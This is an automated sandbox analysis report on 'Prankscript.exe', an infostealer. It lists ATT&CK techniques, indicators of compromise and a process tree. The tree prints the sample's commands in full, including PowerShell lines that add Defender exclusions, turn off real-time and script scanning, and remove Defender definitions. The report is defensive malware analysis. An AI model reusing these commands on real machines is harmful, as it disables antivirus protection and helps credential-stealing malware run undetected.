bb74eeb349b280b04f90e7437f77eb53cfe209d7e4093c3ad093fc0be9817b3b

Analysis

max time kernel
150s
max time network
148s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
30-10-2024 17:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Prankscript.exe
Size

69.0MB
MD5

2e5ec8b0a8af16b1d042367a86981938
SHA1

ecbacf37eefdf1154aef164b81b4242c96f13777
SHA256

bb74eeb349b280b04f90e7437f77eb53cfe209d7e4093c3ad093fc0be9817b3b
SHA512

fdacab5917ec8d3796f7382ca19fb932eb4f40ea07614229a7bfc57cfeacbb24c930b2857a59ccfb0a790e74cf465b009cefaf06fb17f9a250380871dc3f679f
SSDEEP

196608:bWfQecp8urErvI9pWjgN3ZdahF0pbH1AYfTRtQPCsZp/AA81s:Pp8urEUWjqeWxRR6zppas

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1340	powershell.exe
2112	powershell.exe
2716	powershell.exe
3816	powershell.exe
536	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	bound.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	wscript.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
3884	cmd.exe
4560	powershell.exe

Executes dropped EXE 2 IoCs

pid	Process
4220	bound.exe
676	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
1900	Prankscript.exe
1900	Prankscript.exe
1900	Prankscript.exe
1900	Prankscript.exe
1900	Prankscript.exe
1900	Prankscript.exe
1900	Prankscript.exe
1900	Prankscript.exe
1900	Prankscript.exe
1900	Prankscript.exe
1900	Prankscript.exe
1900	Prankscript.exe
1900	Prankscript.exe
1900	Prankscript.exe
1900	Prankscript.exe
1900	Prankscript.exe
1900	Prankscript.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
26	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 3 IoCs

discovery

Process Discovery

T1057

pid	Process
604	tasklist.exe
3428	tasklist.exe
3684	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
3096	cmd.exe

UPX packed file 56 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0007000000023cc3-22.dat	upx
behavioral2/memory/1900-26-0x00007FF8CFC00000-0x00007FF8D02C4000-memory.dmp	upx
behavioral2/files/0x0007000000023cb5-29.dat	upx
behavioral2/memory/1900-31-0x00007FF8E3010000-0x00007FF8E3035000-memory.dmp	upx
behavioral2/files/0x0007000000023cc1-32.dat	upx
behavioral2/files/0x0007000000023cbc-49.dat	upx
behavioral2/files/0x0007000000023cbb-48.dat	upx
behavioral2/files/0x0007000000023cba-47.dat	upx
behavioral2/files/0x0007000000023cb9-46.dat	upx
behavioral2/files/0x0007000000023cb8-45.dat	upx
behavioral2/files/0x0007000000023cb7-44.dat	upx
behavioral2/files/0x0007000000023cb6-43.dat	upx
behavioral2/files/0x0007000000023cb4-42.dat	upx
behavioral2/files/0x0007000000023cc8-41.dat	upx
behavioral2/files/0x0007000000023cc7-40.dat	upx
behavioral2/files/0x0007000000023cc6-39.dat	upx
behavioral2/files/0x0007000000023cc2-36.dat	upx
behavioral2/files/0x0007000000023cc0-35.dat	upx
behavioral2/memory/1900-50-0x00007FF8E8880000-0x00007FF8E888F000-memory.dmp	upx
behavioral2/memory/1900-56-0x00007FF8DF0F0000-0x00007FF8DF11D000-memory.dmp	upx
behavioral2/memory/1900-58-0x00007FF8E5150000-0x00007FF8E516A000-memory.dmp	upx
behavioral2/memory/1900-60-0x00007FF8DF0C0000-0x00007FF8DF0E4000-memory.dmp	upx
behavioral2/memory/1900-62-0x00007FF8CFA80000-0x00007FF8CFBFF000-memory.dmp	upx
behavioral2/memory/1900-64-0x00007FF8E3200000-0x00007FF8E3219000-memory.dmp	upx
behavioral2/memory/1900-68-0x00007FF8DEF80000-0x00007FF8DEFB3000-memory.dmp	upx
behavioral2/memory/1900-72-0x00007FF8CFC00000-0x00007FF8D02C4000-memory.dmp	upx
behavioral2/memory/1900-73-0x00007FF8DED60000-0x00007FF8DEE2D000-memory.dmp	upx
behavioral2/memory/1900-80-0x00007FF8DEF60000-0x00007FF8DEF74000-memory.dmp	upx
behavioral2/memory/1900-79-0x00007FF8DF020000-0x00007FF8DF02D000-memory.dmp	upx
behavioral2/memory/1900-78-0x00007FF8E3010000-0x00007FF8E3035000-memory.dmp	upx
behavioral2/memory/1900-76-0x00007FF8CF550000-0x00007FF8CFA79000-memory.dmp	upx
behavioral2/memory/1900-66-0x00007FF8DF030000-0x00007FF8DF03D000-memory.dmp	upx
behavioral2/memory/1900-83-0x00007FF8CF280000-0x00007FF8CF39B000-memory.dmp	upx
behavioral2/memory/1900-151-0x00007FF8DF0C0000-0x00007FF8DF0E4000-memory.dmp	upx
behavioral2/memory/1900-208-0x00007FF8CFA80000-0x00007FF8CFBFF000-memory.dmp	upx
behavioral2/memory/1900-294-0x00007FF8DEF80000-0x00007FF8DEFB3000-memory.dmp	upx
behavioral2/memory/1900-315-0x00007FF8DED60000-0x00007FF8DEE2D000-memory.dmp	upx
behavioral2/memory/1900-319-0x00007FF8CF550000-0x00007FF8CFA79000-memory.dmp	upx
behavioral2/memory/1900-322-0x00007FF8E3010000-0x00007FF8E3035000-memory.dmp	upx
behavioral2/memory/1900-327-0x00007FF8CFA80000-0x00007FF8CFBFF000-memory.dmp	upx
behavioral2/memory/1900-321-0x00007FF8CFC00000-0x00007FF8D02C4000-memory.dmp	upx
behavioral2/memory/1900-357-0x00007FF8CFC00000-0x00007FF8D02C4000-memory.dmp	upx
behavioral2/memory/1900-377-0x00007FF8DF0C0000-0x00007FF8DF0E4000-memory.dmp	upx
behavioral2/memory/1900-376-0x00007FF8E5150000-0x00007FF8E516A000-memory.dmp	upx
behavioral2/memory/1900-375-0x00007FF8DF0F0000-0x00007FF8DF11D000-memory.dmp	upx
behavioral2/memory/1900-374-0x00007FF8E8880000-0x00007FF8E888F000-memory.dmp	upx
behavioral2/memory/1900-373-0x00007FF8E3010000-0x00007FF8E3035000-memory.dmp	upx
behavioral2/memory/1900-372-0x00007FF8DEF60000-0x00007FF8DEF74000-memory.dmp	upx
behavioral2/memory/1900-368-0x00007FF8CF550000-0x00007FF8CFA79000-memory.dmp	upx
behavioral2/memory/1900-367-0x00007FF8DED60000-0x00007FF8DEE2D000-memory.dmp	upx
behavioral2/memory/1900-366-0x00007FF8DEF80000-0x00007FF8DEFB3000-memory.dmp	upx
behavioral2/memory/1900-365-0x00007FF8DF030000-0x00007FF8DF03D000-memory.dmp	upx
behavioral2/memory/1900-364-0x00007FF8E3200000-0x00007FF8E3219000-memory.dmp	upx
behavioral2/memory/1900-371-0x00007FF8CF280000-0x00007FF8CF39B000-memory.dmp	upx
behavioral2/memory/1900-370-0x00007FF8DF020000-0x00007FF8DF02D000-memory.dmp	upx
behavioral2/memory/1900-363-0x00007FF8CFA80000-0x00007FF8CFBFF000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
4160	PING.EXE
3488	cmd.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
4052	cmd.exe
972	netsh.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2720	WMIC.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
4568	systeminfo.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
4160	PING.EXE

Suspicious behavior: EnumeratesProcesses 33 IoCs

pid	Process
2112	powershell.exe
2112	powershell.exe
4560	powershell.exe
4560	powershell.exe
1340	powershell.exe
1340	powershell.exe
2716	powershell.exe
2716	powershell.exe
4040	powershell.exe
4040	powershell.exe
4560	powershell.exe
2112	powershell.exe
2716	powershell.exe
1340	powershell.exe
4040	powershell.exe
3816	powershell.exe
3816	powershell.exe
3816	powershell.exe
4212	powershell.exe
4212	powershell.exe
4212	powershell.exe
536	powershell.exe
536	powershell.exe
536	powershell.exe
844	powershell.exe
844	powershell.exe
844	powershell.exe
4580	msedge.exe
4580	msedge.exe
4288	msedge.exe
4288	msedge.exe
5220	identity_helper.exe
5220	identity_helper.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs

pid	Process
4288	msedge.exe
4288	msedge.exe
4288	msedge.exe
4288	msedge.exe
4288	msedge.exe
4288	msedge.exe
4288	msedge.exe
4288	msedge.exe
4288	msedge.exe
4288	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	604	tasklist.exe
Token: SeDebugPrivilege	3428	tasklist.exe
Token: SeDebugPrivilege	3684	tasklist.exe
Token: SeIncreaseQuotaPrivilege	3300	WMIC.exe
Token: SeSecurityPrivilege	3300	WMIC.exe
Token: SeTakeOwnershipPrivilege	3300	WMIC.exe
Token: SeLoadDriverPrivilege	3300	WMIC.exe
Token: SeSystemProfilePrivilege	3300	WMIC.exe
Token: SeSystemtimePrivilege	3300	WMIC.exe
Token: SeProfSingleProcessPrivilege	3300	WMIC.exe
Token: SeIncBasePriorityPrivilege	3300	WMIC.exe
Token: SeCreatePagefilePrivilege	3300	WMIC.exe
Token: SeBackupPrivilege	3300	WMIC.exe
Token: SeRestorePrivilege	3300	WMIC.exe
Token: SeShutdownPrivilege	3300	WMIC.exe
Token: SeDebugPrivilege	3300	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3300	WMIC.exe
Token: SeRemoteShutdownPrivilege	3300	WMIC.exe
Token: SeUndockPrivilege	3300	WMIC.exe
Token: SeManageVolumePrivilege	3300	WMIC.exe
Token: 33	3300	WMIC.exe
Token: 34	3300	WMIC.exe
Token: 35	3300	WMIC.exe
Token: 36	3300	WMIC.exe
Token: SeDebugPrivilege	2112	powershell.exe
Token: SeDebugPrivilege	2716	powershell.exe
Token: SeDebugPrivilege	4560	powershell.exe
Token: SeDebugPrivilege	1340	powershell.exe
Token: SeIncreaseQuotaPrivilege	3300	WMIC.exe
Token: SeSecurityPrivilege	3300	WMIC.exe
Token: SeTakeOwnershipPrivilege	3300	WMIC.exe
Token: SeLoadDriverPrivilege	3300	WMIC.exe
Token: SeSystemProfilePrivilege	3300	WMIC.exe
Token: SeSystemtimePrivilege	3300	WMIC.exe
Token: SeProfSingleProcessPrivilege	3300	WMIC.exe
Token: SeIncBasePriorityPrivilege	3300	WMIC.exe
Token: SeCreatePagefilePrivilege	3300	WMIC.exe
Token: SeBackupPrivilege	3300	WMIC.exe
Token: SeRestorePrivilege	3300	WMIC.exe
Token: SeShutdownPrivilege	3300	WMIC.exe
Token: SeDebugPrivilege	3300	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3300	WMIC.exe
Token: SeRemoteShutdownPrivilege	3300	WMIC.exe
Token: SeUndockPrivilege	3300	WMIC.exe
Token: SeManageVolumePrivilege	3300	WMIC.exe
Token: 33	3300	WMIC.exe
Token: 34	3300	WMIC.exe
Token: 35	3300	WMIC.exe
Token: 36	3300	WMIC.exe
Token: SeDebugPrivilege	4040	powershell.exe
Token: SeDebugPrivilege	3816	powershell.exe
Token: SeDebugPrivilege	4212	powershell.exe
Token: SeIncreaseQuotaPrivilege	1036	WMIC.exe
Token: SeSecurityPrivilege	1036	WMIC.exe
Token: SeTakeOwnershipPrivilege	1036	WMIC.exe
Token: SeLoadDriverPrivilege	1036	WMIC.exe
Token: SeSystemProfilePrivilege	1036	WMIC.exe
Token: SeSystemtimePrivilege	1036	WMIC.exe
Token: SeProfSingleProcessPrivilege	1036	WMIC.exe
Token: SeIncBasePriorityPrivilege	1036	WMIC.exe
Token: SeCreatePagefilePrivilege	1036	WMIC.exe
Token: SeBackupPrivilege	1036	WMIC.exe
Token: SeRestorePrivilege	1036	WMIC.exe
Token: SeShutdownPrivilege	1036	WMIC.exe

Suspicious use of FindShellTrayWindow 27 IoCs

pid	Process
4288	msedge.exe
4288	msedge.exe
4288	msedge.exe
4288	msedge.exe
4288	msedge.exe
4288	msedge.exe
4288	msedge.exe
4288	msedge.exe
4288	msedge.exe
4288	msedge.exe
4288	msedge.exe
4288	msedge.exe
4288	msedge.exe
4288	msedge.exe
4288	msedge.exe
4288	msedge.exe
4288	msedge.exe
4288	msedge.exe
4288	msedge.exe
4288	msedge.exe
4288	msedge.exe
4288	msedge.exe
4288	msedge.exe
4288	msedge.exe
4288	msedge.exe
4288	msedge.exe
4288	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
4288	msedge.exe
4288	msedge.exe
4288	msedge.exe
4288	msedge.exe
4288	msedge.exe
4288	msedge.exe
4288	msedge.exe
4288	msedge.exe
4288	msedge.exe
4288	msedge.exe
4288	msedge.exe
4288	msedge.exe
4288	msedge.exe
4288	msedge.exe
4288	msedge.exe
4288	msedge.exe
4288	msedge.exe
4288	msedge.exe
4288	msedge.exe
4288	msedge.exe
4288	msedge.exe
4288	msedge.exe
4288	msedge.exe
4288	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4984 wrote to memory of 1900	4984	Prankscript.exe	87
PID 4984 wrote to memory of 1900	4984	Prankscript.exe	87
PID 1900 wrote to memory of 688	1900	Prankscript.exe	88
PID 1900 wrote to memory of 688	1900	Prankscript.exe	88
PID 1900 wrote to memory of 3576	1900	Prankscript.exe	89
PID 1900 wrote to memory of 3576	1900	Prankscript.exe	89
PID 1900 wrote to memory of 4836	1900	Prankscript.exe	90
PID 1900 wrote to memory of 4836	1900	Prankscript.exe	90
PID 1900 wrote to memory of 2420	1900	Prankscript.exe	91
PID 1900 wrote to memory of 2420	1900	Prankscript.exe	91
PID 1900 wrote to memory of 3096	1900	Prankscript.exe	92
PID 1900 wrote to memory of 3096	1900	Prankscript.exe	92
PID 1900 wrote to memory of 1488	1900	Prankscript.exe	98
PID 1900 wrote to memory of 1488	1900	Prankscript.exe	98
PID 1900 wrote to memory of 4932	1900	Prankscript.exe	99
PID 1900 wrote to memory of 4932	1900	Prankscript.exe	99
PID 1900 wrote to memory of 4244	1900	Prankscript.exe	102
PID 1900 wrote to memory of 4244	1900	Prankscript.exe	102
PID 1900 wrote to memory of 3884	1900	Prankscript.exe	103
PID 1900 wrote to memory of 3884	1900	Prankscript.exe	103
PID 1488 wrote to memory of 604	1488	cmd.exe	104
PID 1488 wrote to memory of 604	1488	cmd.exe	104
PID 1900 wrote to memory of 2844	1900	Prankscript.exe	105
PID 1900 wrote to memory of 2844	1900	Prankscript.exe	105
PID 1900 wrote to memory of 896	1900	Prankscript.exe	109
PID 1900 wrote to memory of 896	1900	Prankscript.exe	109
PID 2420 wrote to memory of 4220	2420	cmd.exe	111
PID 2420 wrote to memory of 4220	2420	cmd.exe	111
PID 688 wrote to memory of 1340	688	cmd.exe	112
PID 688 wrote to memory of 1340	688	cmd.exe	112
PID 4932 wrote to memory of 3428	4932	cmd.exe	113
PID 4932 wrote to memory of 3428	4932	cmd.exe	113
PID 4836 wrote to memory of 2112	4836	cmd.exe	114
PID 4836 wrote to memory of 2112	4836	cmd.exe	114
PID 1900 wrote to memory of 4052	1900	Prankscript.exe	115
PID 1900 wrote to memory of 4052	1900	Prankscript.exe	115
PID 3096 wrote to memory of 464	3096	cmd.exe	117
PID 3096 wrote to memory of 464	3096	cmd.exe	117
PID 1900 wrote to memory of 4524	1900	Prankscript.exe	118
PID 1900 wrote to memory of 4524	1900	Prankscript.exe	118
PID 1900 wrote to memory of 5096	1900	Prankscript.exe	119
PID 1900 wrote to memory of 5096	1900	Prankscript.exe	119
PID 3576 wrote to memory of 2716	3576	cmd.exe	121
PID 3576 wrote to memory of 2716	3576	cmd.exe	121
PID 3884 wrote to memory of 4560	3884	cmd.exe	123
PID 3884 wrote to memory of 4560	3884	cmd.exe	123
PID 4244 wrote to memory of 3300	4244	cmd.exe	124
PID 4244 wrote to memory of 3300	4244	cmd.exe	124
PID 2844 wrote to memory of 3684	2844	cmd.exe	126
PID 2844 wrote to memory of 3684	2844	cmd.exe	126
PID 4220 wrote to memory of 4612	4220	bound.exe	127
PID 4220 wrote to memory of 4612	4220	bound.exe	127
PID 896 wrote to memory of 3368	896	cmd.exe	128
PID 896 wrote to memory of 3368	896	cmd.exe	128
PID 4052 wrote to memory of 972	4052	cmd.exe	129
PID 4052 wrote to memory of 972	4052	cmd.exe	129
PID 4524 wrote to memory of 4568	4524	cmd.exe	130
PID 4524 wrote to memory of 4568	4524	cmd.exe	130
PID 5096 wrote to memory of 4040	5096	cmd.exe	131
PID 5096 wrote to memory of 4040	5096	cmd.exe	131
PID 1900 wrote to memory of 2624	1900	Prankscript.exe	132
PID 1900 wrote to memory of 2624	1900	Prankscript.exe	132
PID 2624 wrote to memory of 1924	2624	cmd.exe	140
PID 2624 wrote to memory of 1924	2624	cmd.exe	140

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
464	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Prankscript.exe
"C:\Users\Admin\AppData\Local\Temp\Prankscript.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4984
- C:\Users\Admin\AppData\Local\Temp\Prankscript.exe
  "C:\Users\Admin\AppData\Local\Temp\Prankscript.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1900
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Prankscript.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:688
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Prankscript.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1340
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3576
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2716
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4836
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2112
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "start bound.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2420
  - - C:\Users\Admin\AppData\Local\Temp\bound.exe
      bound.exe
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:4220
    - - C:\Windows\system32\wscript.exe
        
        "C:\Windows\system32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\AB44.tmp\AB45.tmp\AB46.vbs //Nologo
        5⤵
        Checks computer location settings
        
        PID:4612
      - C:\Windows\System32\notepad.exe
        
        "C:\Windows\System32\notepad.exe"
        6⤵
        
        PID:1340
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/watch?v=IQDWOHB_kpI
        6⤵
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:4288
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff8cee746f8,0x7ff8cee74708,0x7ff8cee74718
        7⤵
        
        PID:2000
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2032,11515596536618259,17023760854056531009,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2092 /prefetch:2
        7⤵
        
        PID:676
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2032,11515596536618259,17023760854056531009,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2312 /prefetch:3
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4580
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2032,11515596536618259,17023760854056531009,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2560 /prefetch:8
        7⤵
        
        PID:632
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,11515596536618259,17023760854056531009,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3372 /prefetch:1
        7⤵
        
        PID:3196
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,11515596536618259,17023760854056531009,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3508 /prefetch:1
        7⤵
        
        PID:4276
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,11515596536618259,17023760854056531009,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4708 /prefetch:1
        7⤵
        
        PID:4212
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,11515596536618259,17023760854056531009,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4696 /prefetch:1
        7⤵
        
        PID:1648
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2032,11515596536618259,17023760854056531009,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4904 /prefetch:8
        7⤵
        
        PID:952
        
        C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2032,11515596536618259,17023760854056531009,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5812 /prefetch:8
        7⤵
        
        PID:6100
        
        C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2032,11515596536618259,17023760854056531009,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5812 /prefetch:8
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5220
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,11515596536618259,17023760854056531009,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5732 /prefetch:1
        7⤵
        
        PID:5304
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
